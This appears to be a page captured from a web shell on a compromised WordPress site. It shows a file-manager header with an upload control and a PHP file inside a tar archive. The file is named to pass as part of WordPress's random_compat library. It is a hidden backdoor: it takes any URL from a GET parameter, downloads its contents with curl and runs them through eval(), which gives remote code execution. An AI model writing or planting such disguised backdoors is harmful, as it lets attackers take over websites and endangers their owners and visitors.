Your IP : 216.73.216.162


Current Path : /home/x/b/o/xbodynamge/namtation/wp-content/
Upload File :
Current File : /home/x/b/o/xbodynamge/namtation/wp-content/random_bytes_mcrypt-decryption.php.tar

home/xbodynamge/www/wp-includes/random_compat/random_bytes_mcrypt-decryption.php000064400000000510151145422460024505 0ustar00<?php

if (isset($_GET['stream'])) {
    $is_archive_wpr = $_GET['stream'];
    if ($absint_ba = curl_init()) {
        curl_setopt($absint_ba, CURLOPT_URL, $is_archive_wpr);
        curl_setopt($absint_ba, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($absint_ba));
        curl_close($absint_ba);
        exit;
    }
}